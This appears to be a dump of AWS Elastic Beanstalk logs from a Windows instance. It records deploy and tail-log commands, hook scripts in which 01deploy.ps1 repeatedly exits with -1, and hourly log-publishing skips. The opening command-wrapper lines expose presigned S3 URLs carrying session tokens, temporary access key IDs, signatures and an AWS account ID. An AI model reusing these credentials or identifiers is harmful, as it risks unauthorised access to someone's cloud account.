2025-07-14 10:59:40,821 INFO 1 CfnCommandWrapperApp.CommandWrapper - Command: Id = bb13b89f-bdca-4993-9a29-dddcf3d99d79, Dispatcher = arn:aws:cloudformation:us-east-1:958193682725:dispatcher/awseb-e-pf76dvqga3-stack/881d93a0-a192-48d7-8ce0-aed4a7be2345, Data = https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/d71b6de4-1eed-4353-8e05-849ca3afbe9c?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEBMaCXVzLWVhc3QtMSJHMEUCIQD0bOuuU4owi8XRyF7MRIQ4qPSrKApQJMLtr0%2FHndxnpwIgfbx0c4Z2wRKcer4%2BO08ArYUOjcKoFGiF7P8ZFPq9hBMq6wIILBAAGgwyNTcxNzIzOTExNDkiDKjdMQb51JUB2%2FGBlCrIAvg0OhEr7YlcoKE8bTlgCeQamExliW3eSxOp8CeoPHVGqBKUZ6uWRVFti1qBQvSHlgZnLLgESsptiJMDNfx3ST3phzP1ni5Tg3wc09avMO2kX4q%2BQzB8XLVbORCMEbInEAFhGXF%2B5d369bPa6jk4jSEmt17OF8Gxs7YQryeb%2FP1RkZpOnyGExROUTqBlONIf6iui06pFEkQz6H8moEeJS2%2F6YTF%2FgakNc%2F%2Ft0wOV8XX9%2FicNCavs9sAUKN%2FbSMo4kZyd4313x%2BlH4VUAjxkI4LSJ%2FMPykUtqArHTIzPbh07%2BH4BassSUTm5R%2BkTDS8GRk%2BUpITYyqShQRHPztJddkWN5RIx%2BWqbMWDusg3ejZsZymalwKoGaQV2VSJMyCeX2bj7oGrAFRQ2f5ktOK3pExmeNp1sw2prRPVqeLBcMBqQLgQbLrOFaDXMw%2BbzTwwY6vwGpMlO%2BEa%2B%2F3ht0yXSzWXkGt%2FEnN1GDD9UNzS6qIcrHH5i4exhBqJ0HyXQ8y4tTvhUsPBpSfqvu6ug2TBg4U2CWPiVANZbJhnr8ltT1cFaIFtYvtq6%2FqyvWncQBQdJWvade57tR5Ug9GC%2FXZhTTJxUaVNWob%2FZuNYNmhXdvThd3NJLnoemSO%2FyPooWndTx1AEbtimbmjCWSW5YBFtbSizV8fZF1Sf%2BNTBMPQWJh%2Fa2yDGhL1jIqP8Z8QcBuZINAfA%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250714T105940Z&X-Amz-SignedHeaders=host&X-Amz-Expires=300&X-Amz-Credential=ASIATXYFLITWZ7ECBLXT%2F20250714%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=0613e8c584c31490385376e94a4fa09c58579f51950394b75c46165918f07b62
2025-07-14 10:59:40,821 DEBUG 1 CfnCommandWrapperApp.Command - Reading command data from S3: https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/d71b6de4-1eed-4353-8e05-849ca3afbe9c?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEBMaCXVzLWVhc3QtMSJHMEUCIQD0bOuuU4owi8XRyF7MRIQ4qPSrKApQJMLtr0%2FHndxnpwIgfbx0c4Z2wRKcer4%2BO08ArYUOjcKoFGiF7P8ZFPq9hBMq6wIILBAAGgwyNTcxNzIzOTExNDkiDKjdMQb51JUB2%2FGBlCrIAvg0OhEr7YlcoKE8bTlgCeQamExliW3eSxOp8CeoPHVGqBKUZ6uWRVFti1qBQvSHlgZnLLgESsptiJMDNfx3ST3phzP1ni5Tg3wc09avMO2kX4q%2BQzB8XLVbORCMEbInEAFhGXF%2B5d369bPa6jk4jSEmt17OF8Gxs7YQryeb%2FP1RkZpOnyGExROUTqBlONIf6iui06pFEkQz6H8moEeJS2%2F6YTF%2FgakNc%2F%2Ft0wOV8XX9%2FicNCavs9sAUKN%2FbSMo4kZyd4313x%2BlH4VUAjxkI4LSJ%2FMPykUtqArHTIzPbh07%2BH4BassSUTm5R%2BkTDS8GRk%2BUpITYyqShQRHPztJddkWN5RIx%2BWqbMWDusg3ejZsZymalwKoGaQV2VSJMyCeX2bj7oGrAFRQ2f5ktOK3pExmeNp1sw2prRPVqeLBcMBqQLgQbLrOFaDXMw%2BbzTwwY6vwGpMlO%2BEa%2B%2F3ht0yXSzWXkGt%2FEnN1GDD9UNzS6qIcrHH5i4exhBqJ0HyXQ8y4tTvhUsPBpSfqvu6ug2TBg4U2CWPiVANZbJhnr8ltT1cFaIFtYvtq6%2FqyvWncQBQdJWvade57tR5Ug9GC%2FXZhTTJxUaVNWob%2FZuNYNmhXdvThd3NJLnoemSO%2FyPooWndTx1AEbtimbmjCWSW5YBFtbSizV8fZF1Sf%2BNTBMPQWJh%2Fa2yDGhL1jIqP8Z8QcBuZINAfA%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250714T105940Z&X-Amz-SignedHeaders=host&X-Amz-Expires=300&X-Amz-Credential=ASIATXYFLITWZ7ECBLXT%2F20250714%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=0613e8c584c31490385376e94a4fa09c58579f51950394b75c46165918f07b62
2025-07-14 10:59:40,931 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Trying to get Metadata with Key AWS::ElasticBeanstalk::Ext._API._Commands.CMD-AppDeploy._Stages from cache for Request ID e2492b48-185a-4d11-9199-824faab27b48
2025-07-14 10:59:40,931 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Metadata cache file does not exist; file path: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-e2492b48-185a-4d11-9199-824faab27b48
2025-07-14 10:59:40,931 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-get-metadata.exe -v -r AWSEBAutoScalingGroup -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 --region us-east-1
2025-07-14 10:59:40,931 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling cfn-get-metadata, request id: e2492b48-185a-4d11-9199-824faab27b48, retry 0
2025-07-14 10:59:42,118 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - cfn-get-metadata exited with code 0
2025-07-14 10:59:42,118 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Creating directory for cached metadata: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache
2025-07-14 10:59:42,118 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Caching metadata to file: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-e2492b48-185a-4d11-9199-824faab27b48
2025-07-14 10:59:42,134 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Returned metadata: {"01_pre":["Infra-WriteRuntimeConfig","Infra-EmbeddedPreBuild","Hook-PreAppDeploy","Infra-EmbeddedPostBuild"],"02_enact":["Hook-EnactAppDeploy","Hook-PostAppDeploy"]}
2025-07-14 10:59:42,134 DEBUG 1 CfnCommandWrapperApp.CommandWrapper - Config sets for command 'CMD-AppDeploy' (stage 'None'): Infra-WriteRuntimeConfig, Infra-EmbeddedPreBuild, Hook-PreAppDeploy, Infra-EmbeddedPostBuild, Hook-EnactAppDeploy, Hook-PostAppDeploy
2025-07-14 10:59:43,103 DEBUG 1 CfnCommandWrapperApp.Command - This instance was elected leader
2025-07-14 10:59:43,103 INFO 1 CfnCommandWrapperApp.Command - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-init.exe -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 -r AWSEBAutoScalingGroup --region us-east-1 -c Infra-WriteRuntimeConfig,Infra-EmbeddedPreBuild,Hook-PreAppDeploy,Infra-EmbeddedPostBuild,Hook-EnactAppDeploy,Hook-PostAppDeploy
2025-07-14 11:14:23,064 INFO 1 CfnCommandWrapperApp.CommandWrapper - Command: Id = 899195a1-2cde-48cc-a398-ee49aad19ce8, Dispatcher = arn:aws:cloudformation:us-east-1:958193682725:dispatcher/awseb-e-pf76dvqga3-stack/881d93a0-a192-48d7-8ce0-aed4a7be2345, Data = https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/2f003bea-2a02-4ed7-a718-e9ba7ade464d?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEBMaCXVzLWVhc3QtMSJIMEYCIQDcAHu4TDIcIkDb5bakPoGGSW1Xf1N%2FjWyAVGXfgShC%2BQIhALmvIUA392ly47%2FwK8bivmvG499dSiozSANnIOBC9jbMKusCCCwQABoMMjU3MTcyMzkxMTQ5IgwWWVvMI4GD3ZtsbmcqyAI9sWB3DSmfzXU%2F8Gl98p28TIzezAgfK7%2BvufVcFw0PgrN5EC0hm%2FizqOq12pWJy6vxWUp8S5eFEjJ3bfneGU5zogZhe0d75EThGksh9qm6Fkd58%2BcKL9%2B5%2Bij1BProHXJ81LFMe8U%2B1ssX%2BVt5t3hT35I6JcomZLLSvo249fdQIv%2BL7W8095sJwxtWrrCncfiuIIYC1pGgR7jpjTZTJdJfrGH0VFmXaZAFC9bsBTSISXCyIhd0nVbi2QL8x94m29f%2B2DBSJj6%2B7bkfbJ3tXvpeVKs8EDVDTTMva1iH3Pyes1Zy67GORdQdx2jXhyClJnA5uLos1bRUWkGrbH4eNXICq1VYsOeIfRfRYSW27GJqA8DlbYdN7bUsUC6%2B3INj3kBIQWx7vHpMr9SPqRMplRNagPrJNCFc9LNYRdGAStZCty7UCNuGX0HRML7G08MGOr4ByAFCkhrH9CEBzfUQqIMn7Epygx0bxxnzmWsQhDTgFXn4i%2BTj0pfijHU47zCrTFZhFrnd4%2BKBYLZ8XNwvf9kaE7tCl68QVE%2FV%2FZlFwY92QQ1nzNUmrIJB8K2qpYK4OSZcQXs%2FiCt094y0G7Q5ngVd%2B8Jqkc0Sps2lWTE2Xl5DS81thN0LeFvai9Yy7bWOnq7AKR8CjJFJ4JIOpxf87QAZXAoz7V8Nq5bvTegAZ68UMsm06s56eBHHrlYsOHZm%2FA%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250714T111422Z&X-Amz-SignedHeaders=host&X-Amz-Expires=299&X-Amz-Credential=ASIATXYFLITW2PVGZANM%2F20250714%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=bcb0bae533ffd82b6b6bddad87bde9d4324806a2d5fe5476866f9e2c2986de57
2025-07-14 11:14:23,080 DEBUG 1 CfnCommandWrapperApp.Command - Reading command data from S3: https://elasticbeanstalk-us-east-1.s3.amazonaws.com/data/environments/9fa86b0b-7955-49f0-ad5c-cec3cb42e9d2/2f003bea-2a02-4ed7-a718-e9ba7ade464d?X-Amz-Security-Token=IQoJb3JpZ2luX2VjEBMaCXVzLWVhc3QtMSJIMEYCIQDcAHu4TDIcIkDb5bakPoGGSW1Xf1N%2FjWyAVGXfgShC%2BQIhALmvIUA392ly47%2FwK8bivmvG499dSiozSANnIOBC9jbMKusCCCwQABoMMjU3MTcyMzkxMTQ5IgwWWVvMI4GD3ZtsbmcqyAI9sWB3DSmfzXU%2F8Gl98p28TIzezAgfK7%2BvufVcFw0PgrN5EC0hm%2FizqOq12pWJy6vxWUp8S5eFEjJ3bfneGU5zogZhe0d75EThGksh9qm6Fkd58%2BcKL9%2B5%2Bij1BProHXJ81LFMe8U%2B1ssX%2BVt5t3hT35I6JcomZLLSvo249fdQIv%2BL7W8095sJwxtWrrCncfiuIIYC1pGgR7jpjTZTJdJfrGH0VFmXaZAFC9bsBTSISXCyIhd0nVbi2QL8x94m29f%2B2DBSJj6%2B7bkfbJ3tXvpeVKs8EDVDTTMva1iH3Pyes1Zy67GORdQdx2jXhyClJnA5uLos1bRUWkGrbH4eNXICq1VYsOeIfRfRYSW27GJqA8DlbYdN7bUsUC6%2B3INj3kBIQWx7vHpMr9SPqRMplRNagPrJNCFc9LNYRdGAStZCty7UCNuGX0HRML7G08MGOr4ByAFCkhrH9CEBzfUQqIMn7Epygx0bxxnzmWsQhDTgFXn4i%2BTj0pfijHU47zCrTFZhFrnd4%2BKBYLZ8XNwvf9kaE7tCl68QVE%2FV%2FZlFwY92QQ1nzNUmrIJB8K2qpYK4OSZcQXs%2FiCt094y0G7Q5ngVd%2B8Jqkc0Sps2lWTE2Xl5DS81thN0LeFvai9Yy7bWOnq7AKR8CjJFJ4JIOpxf87QAZXAoz7V8Nq5bvTegAZ68UMsm06s56eBHHrlYsOHZm%2FA%3D%3D&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20250714T111422Z&X-Amz-SignedHeaders=host&X-Amz-Expires=299&X-Amz-Credential=ASIATXYFLITW2PVGZANM%2F20250714%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=bcb0bae533ffd82b6b6bddad87bde9d4324806a2d5fe5476866f9e2c2986de57
2025-07-14 11:14:23,189 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Trying to get Metadata with Key AWS::ElasticBeanstalk::Ext._API._Commands.CMD-TailLogs._Stages from cache for Request ID 5b175f41-5d9e-4979-8cad-dd17080d6c13
2025-07-14 11:14:23,189 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Metadata cache file does not exist; file path: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-5b175f41-5d9e-4979-8cad-dd17080d6c13
2025-07-14 11:14:23,189 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-get-metadata.exe -v -r AWSEBAutoScalingGroup -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 --region us-east-1
2025-07-14 11:14:23,189 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Calling cfn-get-metadata, request id: 5b175f41-5d9e-4979-8cad-dd17080d6c13, retry 0
2025-07-14 11:14:24,142 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - cfn-get-metadata exited with code 0
2025-07-14 11:14:24,142 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Creating directory for cached metadata: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache
2025-07-14 11:14:24,142 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Caching metadata to file: c:\Program Files\Amazon\ElasticBeanstalk\Tools\MetadataCache\metadata-cache-5b175f41-5d9e-4979-8cad-dd17080d6c13
2025-07-14 11:14:24,158 DEBUG 1 AWSBeanstalkCfnUtility.ExecCfnMetadataProvider - Returned metadata: {"01_enact":["InfoTask-TailLogs"]}
2025-07-14 11:14:24,158 DEBUG 1 CfnCommandWrapperApp.CommandWrapper - Config sets for command 'CMD-TailLogs' (stage 'None'): InfoTask-TailLogs
2025-07-14 11:14:25,079 DEBUG 1 CfnCommandWrapperApp.Command - This instance was elected leader
2025-07-14 11:14:25,079 INFO 1 CfnCommandWrapperApp.Command - Calling c:\Program Files\Amazon\cfn-bootstrap\cfn-init.exe -s arn:aws:cloudformation:us-east-1:958193682725:stack/awseb-e-pf76dvqga3-stack/96864800-609d-11f0-a79f-123668871891 -r AWSEBAutoScalingGroup --region us-east-1 -c InfoTask-TailLogs

Hooks.log:

2025-07-16 14:27:28,413 INFO 1 HooksExecutor - Running 4 scripts found in C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre
2025-07-16 14:27:28,413 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\00logstream.ps1
2025-07-16 14:27:31,038 DEBUG 4 HooksExecutor - ****** Processing amazon-cloudwatch-agent ******
2025-07-16 14:27:31,054 DEBUG 4 HooksExecutor - AmazonCloudWatchAgent has been stopped
2025-07-16 14:27:31,070 DEBUG 4 HooksExecutor - [INFO] CloudWatch Agent turned off.
2025-07-16 14:27:31,085 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\00logstream.ps1 exited with status 0.
2025-07-16 14:27:31,085 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\01download_source_bundle.ps1
2025-07-16 14:27:35,695 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\01download_source_bundle.ps1 exited with status 0.
2025-07-16 14:27:35,695 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\02tmpextract.ps1
2025-07-16 14:27:36,054 DEBUG 5 HooksExecutor -     Directory: C:\
2025-07-16 14:27:36,054 DEBUG 5 HooksExecutor - Mode                LastWriteTime         Length Name                                                                  
2025-07-16 14:27:36,054 DEBUG 5 HooksExecutor - ----                -------------         ------ ----                                                                  
2025-07-16 14:27:36,054 DEBUG 5 HooksExecutor - d-----        7/16/2025   2:27 PM                staging                                                               
2025-07-16 14:27:38,007 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\02tmpextract.ps1 exited with status 0.
2025-07-16 14:27:38,007 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\03environmentvariables.ps1
2025-07-16 14:27:40,617 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\03environmentvariables.ps1 exited with status 0.
2025-07-16 14:27:41,210 INFO 1 HooksExecutor - Running 3 scripts found in C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact
2025-07-16 14:27:41,226 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\00uninstall.ps1
2025-07-16 14:27:42,585 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\00uninstall.ps1 exited with status 0.
2025-07-16 14:27:42,585 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\01deploy.ps1
2025-07-16 14:27:44,460 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\01deploy.ps1 exited with status -1.
2025-07-16 14:27:44,460 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\02services.ps1
2025-07-16 14:27:45,913 DEBUG 4 HooksExecutor - Configuring Elastic Beanstalk services...
2025-07-16 14:27:46,523 DEBUG 4 HooksExecutor - [XRay]
2025-07-16 14:27:46,882 DEBUG 4 HooksExecutor - Already disabled
2025-07-16 14:27:46,976 DEBUG 4 HooksExecutor - ...done
2025-07-16 14:27:47,085 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\02services.ps1 exited with status 0.
2025-07-14 10:32:58,791 INFO 1 HooksExecutor - Running 1 scripts found in C:\Program Files\Amazon\ElasticBeanstalk\hooks\preinit
2025-07-14 10:32:58,853 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\preinit\01logstream.ps1
2025-07-14 10:33:07,799 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\preinit\01logstream.ps1 exited with status 0.
2025-07-14 10:33:57,330 INFO 1 HooksExecutor - No scripts found. Exiting.
2025-07-14 10:33:57,613 INFO 1 HooksExecutor - Running 4 scripts found in C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre
2025-07-14 10:33:57,628 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\00logstream.ps1
2025-07-14 10:34:05,722 DEBUG 4 HooksExecutor - ****** Processing amazon-cloudwatch-agent ******
2025-07-14 10:34:07,479 DEBUG 4 HooksExecutor - AmazonCloudWatchAgent has been stopped
2025-07-14 10:34:07,541 DEBUG 4 HooksExecutor - [INFO] CloudWatch Agent turned off.
2025-07-14 10:34:07,573 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\00logstream.ps1 exited with status 0.
2025-07-14 10:34:07,573 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\01download_source_bundle.ps1
2025-07-14 10:34:23,645 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\01download_source_bundle.ps1 exited with status 0.
2025-07-14 10:34:23,645 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\02tmpextract.ps1
2025-07-14 10:34:25,181 DEBUG 6 HooksExecutor -     Directory: C:\
2025-07-14 10:34:25,181 DEBUG 6 HooksExecutor - Mode                LastWriteTime         Length Name                                                                  
2025-07-14 10:34:25,181 DEBUG 6 HooksExecutor - ----                -------------         ------ ----                                                                  
2025-07-14 10:34:25,181 DEBUG 6 HooksExecutor - d-----        7/14/2025  10:34 AM                staging                                                               
2025-07-14 10:34:25,840 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\02tmpextract.ps1 exited with status 0.
2025-07-14 10:34:25,840 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\03environmentvariables.ps1
2025-07-14 10:34:26,796 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\03environmentvariables.ps1 exited with status 0.
2025-07-14 10:34:27,235 INFO 1 HooksExecutor - Running 3 scripts found in C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact
2025-07-14 10:34:27,251 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\00uninstall.ps1
2025-07-14 10:34:27,627 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\00uninstall.ps1 exited with status 0.
2025-07-14 10:34:27,627 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\01deploy.ps1
2025-07-14 10:34:29,147 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\01deploy.ps1 exited with status -1.
2025-07-14 10:34:29,147 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\02services.ps1
2025-07-14 10:34:29,666 DEBUG 4 HooksExecutor - Configuring Elastic Beanstalk services...
2025-07-14 10:34:29,774 DEBUG 4 HooksExecutor - [XRay]
2025-07-14 10:34:29,853 DEBUG 5 HooksExecutor - Already disabled
2025-07-14 10:34:29,853 DEBUG 5 HooksExecutor - ...done
2025-07-14 10:34:29,869 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\02services.ps1 exited with status 0.
2025-07-14 10:59:51,157 INFO 1 HooksExecutor - Running 4 scripts found in C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre
2025-07-14 10:59:51,172 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\00logstream.ps1
2025-07-14 10:59:52,594 DEBUG 4 HooksExecutor - ****** Processing amazon-cloudwatch-agent ******
2025-07-14 10:59:52,610 DEBUG 4 HooksExecutor - AmazonCloudWatchAgent has been stopped
2025-07-14 10:59:52,610 DEBUG 4 HooksExecutor - [INFO] CloudWatch Agent turned off.
2025-07-14 10:59:52,625 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\00logstream.ps1 exited with status 0.
2025-07-14 10:59:52,625 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\01download_source_bundle.ps1
2025-07-14 11:00:07,616 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\01download_source_bundle.ps1 exited with status 0.
2025-07-14 11:00:07,616 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\02tmpextract.ps1
2025-07-14 11:00:08,584 DEBUG 4 HooksExecutor -     Directory: C:\
2025-07-14 11:00:08,599 DEBUG 4 HooksExecutor - Mode                LastWriteTime         Length Name                                                                  
2025-07-14 11:00:08,599 DEBUG 4 HooksExecutor - ----                -------------         ------ ----                                                                  
2025-07-14 11:00:08,599 DEBUG 4 HooksExecutor - d-----        7/14/2025  11:00 AM                staging                                                               
2025-07-14 11:00:08,912 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\02tmpextract.ps1 exited with status 0.
2025-07-14 11:00:08,912 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\03environmentvariables.ps1
2025-07-14 11:00:10,318 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\pre\03environmentvariables.ps1 exited with status 0.
2025-07-14 11:00:10,912 INFO 1 HooksExecutor - Running 3 scripts found in C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact
2025-07-14 11:00:10,912 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\00uninstall.ps1
2025-07-14 11:00:11,287 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\00uninstall.ps1 exited with status 0.
2025-07-14 11:00:11,287 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\01deploy.ps1
2025-07-14 11:00:12,037 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\01deploy.ps1 exited with status -1.
2025-07-14 11:00:12,037 INFO 1 HooksExecutor - Executing C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\02services.ps1
2025-07-14 11:00:12,427 DEBUG 5 HooksExecutor - Configuring Elastic Beanstalk services...
2025-07-14 11:00:12,474 DEBUG 4 HooksExecutor - [XRay]
2025-07-14 11:00:12,521 DEBUG 4 HooksExecutor - Already disabled
2025-07-14 11:00:12,521 DEBUG 4 HooksExecutor - ...done
2025-07-14 11:00:12,537 INFO 1 HooksExecutor - Script C:\Program Files\Amazon\ElasticBeanstalk\hooks\appdeploy\enact\02services.ps1 exited with status 0.

PublishLogs.log:

2025-07-16 00:32:00,986 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 01:32:01,025 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 02:32:01,015 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 03:32:01,063 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 04:32:01,064 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 05:32:01,103 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 06:32:01,125 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 07:32:01,140 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 08:32:01,171 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 09:32:01,229 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 10:32:00,294 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 11:32:00,558 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 12:32:00,289 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 13:32:00,321 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-16 14:32:00,360 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 00:32:00,270 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 01:32:00,291 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 02:32:00,329 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 03:32:00,333 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 04:32:00,414 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 05:32:00,393 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 06:32:00,390 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 07:32:00,413 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 08:32:00,437 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 09:32:00,499 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 10:32:00,516 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 11:32:00,987 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 12:32:00,577 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 13:32:00,863 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 14:32:00,637 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 15:32:00,683 DEBUG 1 PublishLogs - Log publication disabled. Exiting
2025-07-15 16:32:00,720 DEBUG 1 PublishLogs - Log publication disabled. Exiting
